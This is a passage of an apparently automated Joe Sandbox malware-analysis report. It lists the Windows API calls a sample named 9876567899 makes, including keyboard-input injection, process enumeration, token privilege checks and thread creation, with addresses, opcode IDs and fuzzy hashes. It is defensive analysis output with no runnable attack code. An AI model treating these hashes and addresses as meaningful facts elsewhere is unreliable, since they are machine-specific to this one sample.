                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                • String ID:
                                                                • API String ID: 2652629310-0
                                                                • Opcode ID: 56c7eb64f4952d8d1a7dc259f83e30ae78b1513fe4994ddbf1153ebcfce38c6e
                                                                • Instruction ID: 4b1d5987b2e5c612e5c0f20e73591c6447116879a260695939e46a2cd126b87e
                                                                • Opcode Fuzzy Hash: 56c7eb64f4952d8d1a7dc259f83e30ae78b1513fe4994ddbf1153ebcfce38c6e
                                                                • Instruction Fuzzy Hash: 7631BC72A0020AEBDF259F64DC45EBE7BA5EB41710F054168FC44D7291EB39ED50CBA0
                                                                APIs
                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 007A5352
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A5375
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007A5382
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007A53A8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: LongWindow$InvalidateMessageRectSend
                                                                • String ID:
                                                                • API String ID: 3340791633-0
                                                                • Opcode ID: 8ec24d115c66e371fc198c9fe6d45fa2443054b903ce79c399e312ea844aafc4
                                                                • Instruction ID: f8253f47388bd5e7af9bedd8ed2b26ba5eb8b11a6f090372afef422abf016b0e
                                                                • Opcode Fuzzy Hash: 8ec24d115c66e371fc198c9fe6d45fa2443054b903ce79c399e312ea844aafc4
                                                                • Instruction Fuzzy Hash: DE31C234A56A08FFEF349B14CC56BE83765ABC7398F584201FA11961E1C7BCA980DB42
                                                                APIs
                                                                • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0077ABF1
                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 0077AC0D
                                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 0077AC74
                                                                • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0077ACC6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                • String ID:
                                                                • API String ID: 432972143-0
                                                                • Opcode ID: e9b3e3760d67f92022cc93b5a6742146307bf115d1693830a7ae855dcf5e47f5
                                                                • Instruction ID: 9279e59dae8a3851c3392c43991e36b0035998a5286bb64a6f0de19995fde76e
                                                                • Opcode Fuzzy Hash: e9b3e3760d67f92022cc93b5a6742146307bf115d1693830a7ae855dcf5e47f5
                                                                • Instruction Fuzzy Hash: CB31F830A00718BFFF26CB658809BFE7BA5ABC5350F04D61AE489521D1D37D89858776
                                                                APIs
                                                                • ClientToScreen.USER32(?,?), ref: 007A769A
                                                                • GetWindowRect.USER32(?,?), ref: 007A7710
                                                                • PtInRect.USER32(?,?,007A8B89), ref: 007A7720
                                                                • MessageBeep.USER32(00000000), ref: 007A778C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                • String ID:
                                                                • API String ID: 1352109105-0
                                                                • Opcode ID: 8222429e87603aa520d2ab989237abd93db59250bd1d72e5fee2c958dc36e2aa
                                                                • Instruction ID: 5a95ffa9941d253f9e6d829f03537fd33fb6085fb1a26ae83c4b75ec4bcbd60c
                                                                • Opcode Fuzzy Hash: 8222429e87603aa520d2ab989237abd93db59250bd1d72e5fee2c958dc36e2aa
                                                                • Instruction Fuzzy Hash: 5041AD34A05254EFCB09CF58CC94EA9B7F4FB8A310F5982A8E4149F261C738A941CF90
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 007A16EB
                                                                  • Part of subcall function 00773A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00773A57
                                                                  • Part of subcall function 00773A3D: GetCurrentThreadId.KERNEL32 ref: 00773A5E
                                                                  • Part of subcall function 00773A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007725B3), ref: 00773A65
                                                                • GetCaretPos.USER32(?), ref: 007A16FF
                                                                • ClientToScreen.USER32(00000000,?), ref: 007A174C
                                                                • GetForegroundWindow.USER32 ref: 007A1752
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                • String ID:
                                                                • API String ID: 2759813231-0
                                                                • Opcode ID: 75756b039283b4b37f47a5a0488ce62a4494c86dcf847f1687b7e66d50cce1e6
                                                                • Instruction ID: 199fa5c7aea7d3107031c96be1125a6b4487e95fb12657b37f0ee0272d4b50b1
                                                                • Opcode Fuzzy Hash: 75756b039283b4b37f47a5a0488ce62a4494c86dcf847f1687b7e66d50cce1e6
                                                                • Instruction Fuzzy Hash: 84316075D00149AFD704DFA9C8858EEB7FDEF89304B548069E415E7251D7349E41CBA0
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0077D501
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0077D50F
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0077D52F
                                                                • CloseHandle.KERNEL32(00000000), ref: 0077D5DC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 420147892-0
                                                                • Opcode ID: 8104bcd26ed86846d14a889cb13d96660b6fb338efbfc9dd99b508baa03a8f99
                                                                • Instruction ID: fdac29c39eb320e89cdccb77d7d8b6e701500ab5697455adbf8ec287c4ecc539
                                                                • Opcode Fuzzy Hash: 8104bcd26ed86846d14a889cb13d96660b6fb338efbfc9dd99b508baa03a8f99
                                                                • Instruction Fuzzy Hash: 5A31B372108300EFD711EF54C895AAFBBF8EFD9384F10452DF685821A1EB759985CBA2
                                                                APIs
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                • GetCursorPos.USER32(?), ref: 007A9001
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00767711,?,?,?,?,?), ref: 007A9016
                                                                • GetCursorPos.USER32(?), ref: 007A905E
                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00767711,?,?,?), ref: 007A9094
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                • String ID:
                                                                • API String ID: 2864067406-0
                                                                • Opcode ID: f462a42da49546f0e7588f1cb11eafcf2b4268199ca48b83dfce954557877f9c
                                                                • Instruction ID: f0bf60ac05fe00f60078d10a4bc04517eef14b801149dcb7f53d9079e9769751
                                                                • Opcode Fuzzy Hash: f462a42da49546f0e7588f1cb11eafcf2b4268199ca48b83dfce954557877f9c
                                                                • Instruction Fuzzy Hash: 80219135601018FFCB268F94D859EEB7BB9EB8A391F148155F6054B161C339A960DB60
                                                                APIs
                                                                • GetFileAttributesW.KERNEL32(?,007ACB68), ref: 0077D2FB
                                                                • GetLastError.KERNEL32 ref: 0077D30A
                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0077D319
                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007ACB68), ref: 0077D376
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectory$AttributesErrorFileLast
                                                                • String ID:
                                                                • API String ID: 2267087916-0
                                                                • Opcode ID: 3c5a1d118e3be5530d325b5eb120ff8505881f6a09e4a7b43c80b1d1d5a4b344
                                                                • Instruction ID: e2033a7b7a6cda05b1a3a4209e3f74976e69c63e647c12815b711f823dee028e
                                                                • Opcode Fuzzy Hash: 3c5a1d118e3be5530d325b5eb120ff8505881f6a09e4a7b43c80b1d1d5a4b344
                                                                • Instruction Fuzzy Hash: 96214170505201DF8B20DF28C8858AAB7F4AE967A4F508A1DF499C72E1DB39DD46CB93
                                                                APIs
                                                                  • Part of subcall function 00771014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0077102A
                                                                  • Part of subcall function 00771014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00771036
                                                                  • Part of subcall function 00771014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771045
                                                                  • Part of subcall function 00771014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0077104C
                                                                  • Part of subcall function 00771014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00771062
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007715BE
                                                                • _memcmp.LIBVCRUNTIME ref: 007715E1
                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00771617
                                                                • HeapFree.KERNEL32(00000000), ref: 0077161E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                • String ID:
                                                                • API String ID: 1592001646-0
                                                                • Opcode ID: 059e97b7ceb2d038111571109460a32ecb971550b7184d99215dfe4fdb327fc6
                                                                • Instruction ID: c18340a758ca5b856a792fe0ba322e5ea7d9ea66a17b519caf46b8a5fb471d9c
                                                                • Opcode Fuzzy Hash: 059e97b7ceb2d038111571109460a32ecb971550b7184d99215dfe4fdb327fc6
                                                                • Instruction Fuzzy Hash: BB218E71E00108EFDF14DFA8C945BEEB7B8EF85384F598859E445AB241EB38AA05DB50
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 007A280A
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007A2824
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 007A2832
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007A2840
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$AttributesLayered
                                                                • String ID:
                                                                • API String ID: 2169480361-0
                                                                • Opcode ID: ecf1eb167bdff8218e4161c0c979557d68cd2ba6ccd6f5bae44b3435288c6ef6
                                                                • Instruction ID: 5a6a8ac9f1b92b1ae98adb612e56604d66089adbb835a953e45b3f2b3c1ba1c5
                                                                • Opcode Fuzzy Hash: ecf1eb167bdff8218e4161c0c979557d68cd2ba6ccd6f5bae44b3435288c6ef6
                                                                • Instruction Fuzzy Hash: E321C131605511BFD7159B28C844FAA7B95AFC6324F248258F4268B6E3CB79FD82CB90
                                                                APIs
                                                                  • Part of subcall function 00778D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0077790A,?,000000FF,?,00778754,00000000,?,0000001C,?,?), ref: 00778D8C
                                                                  • Part of subcall function 00778D7D: lstrcpyW.KERNEL32(00000000,?,?,0077790A,?,000000FF,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00778DB2
                                                                  • Part of subcall function 00778D7D: lstrcmpiW.KERNEL32(00000000,?,0077790A,?,000000FF,?,00778754,00000000,?,0000001C,?,?), ref: 00778DE3
                                                                • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00777923
                                                                • lstrcpyW.KERNEL32(00000000,?,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00777949
                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,00778754,00000000,?,0000001C,?,?,00000000), ref: 00777984
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                • String ID: cdecl
                                                                • API String ID: 4031866154-3896280584
                                                                • Opcode ID: 2f9cc81aa916ee87bb30d7fce3009f0ea03a37df69ed71ed29dc8806a07965ed
                                                                • Instruction ID: a0f678016aa2c16988d50ae74539a815239621dc709e867288bdd05e83e357df
                                                                • Opcode Fuzzy Hash: 2f9cc81aa916ee87bb30d7fce3009f0ea03a37df69ed71ed29dc8806a07965ed
                                                                • Instruction Fuzzy Hash: 5B11D63A201201ABCF155F34D849D7A77A9FF95390B50C02AF94AC7264EB39A811CB91
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007A7D0B
                                                                • SetWindowLongW.USER32(00000000,000000F0,?), ref: 007A7D2A
                                                                • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007A7D42
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0078B7AD,00000000), ref: 007A7D6B
                                                                  • Part of subcall function 00729BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00729BB2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Window$Long
                                                                • String ID:
                                                                • API String ID: 847901565-0
                                                                • Opcode ID: e46b6f90d4002abf92f19974296a6456a8e9dcb148a2e50f866de69765b5bfa9
                                                                • Instruction ID: e9eea10e247e65331f8f03ba4858b2e7329cae41eeacd5d2fe8fdc35855118a2
                                                                • Opcode Fuzzy Hash: e46b6f90d4002abf92f19974296a6456a8e9dcb148a2e50f866de69765b5bfa9
                                                                • Instruction Fuzzy Hash: 0811A231605665AFCB159F28CC04A6A3BA5AF86370B558724F835DB2F0E7389950DB50
                                                                APIs
                                                                • SendMessageW.USER32(?,00001060,?,00000004), ref: 007A56BB
                                                                • _wcslen.LIBCMT ref: 007A56CD
                                                                • _wcslen.LIBCMT ref: 007A56D8
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007A5816
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend_wcslen
                                                                • String ID:
                                                                • API String ID: 455545452-0
                                                                • Opcode ID: 8ec7f131bdd8c6fcded7d30868c053a06f18e2270ed908f4812853992bfc62cc
                                                                • Instruction ID: d398df136e75f7f940bd601cbf6cdde229c95948103f70c32fe1119d11eed71b
                                                                • Opcode Fuzzy Hash: 8ec7f131bdd8c6fcded7d30868c053a06f18e2270ed908f4812853992bfc62cc
                                                                • Instruction Fuzzy Hash: EC110671600604E6DB20DF61CC85EEE377CEF86760F104266F905D6081EB7CD980CB60
                                                                APIs
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00771A47
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00771A59
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00771A6F
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00771A8A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: 9c3985466b9ad6068fdbf702da99ac7b7c99865a1a63c9bfe81305c9fd6051c6
                                                                • Instruction ID: 3ad0ef151caf91cbc38a1ac9d145fcd78fc8ef8934586be23d2283e49fbab8e5
                                                                • Opcode Fuzzy Hash: 9c3985466b9ad6068fdbf702da99ac7b7c99865a1a63c9bfe81305c9fd6051c6
                                                                • Instruction Fuzzy Hash: 0711393AD01219FFEF11DBA8CD85FADBB78EB08750F218091EA04B7290D6716E50DB94
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 0077E1FD
                                                                • MessageBoxW.USER32(?,?,?,?), ref: 0077E230
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0077E246
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0077E24D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 2880819207-0
                                                                • Opcode ID: 91e317719598e648f81716a15c4115b157ae3b6152272062314fdba0f65d95de
                                                                • Instruction ID: 8911cbf97687a9996d4ff1e21bc5ccf88ba562772973d7303d0f1619d3d6cd8a
                                                                • Opcode Fuzzy Hash: 91e317719598e648f81716a15c4115b157ae3b6152272062314fdba0f65d95de
                                                                • Instruction Fuzzy Hash: 80112F71A04258BBDB019FACDC45A9F7FACAB89354F00C255F814D7291D678CD008765
                                                                APIs
                                                                • CreateThread.KERNEL32(00000000,?,0073CFF9,00000000,00000004,00000000), ref: 0073D218
                                                                • GetLastError.KERNEL32 ref: 0073D224
                                                                • __dosmaperr.LIBCMT ref: 0073D22B
                                                                • ResumeThread.KERNEL32(00000000), ref: 0073D249
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                • String ID:
                                                                • API String ID: 173952441-0
                                                                • Opcode ID: b43233843b4a70fc5600e370aab970dc28102fd01eab50107b4e3fc98def2bdd
                                                                • Instruction ID: 9f26d44dce493e0d6c1e303b9c5e96af101de495cbe113c63683824108f2e0a9
                                                                • Opcode Fuzzy Hash: b43233843b4a70fc5600e370aab970dc28102fd01eab50107b4e3fc98def2bdd
                                                                • Instruction Fuzzy Hash: F5012632805108BBEB315BA5EC09BAF3A6CEF82330F104219F924921D2CF79CC01C6A1
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0071604C
                                                                • GetStockObject.GDI32(00000011), ref: 00716060
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0071606A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
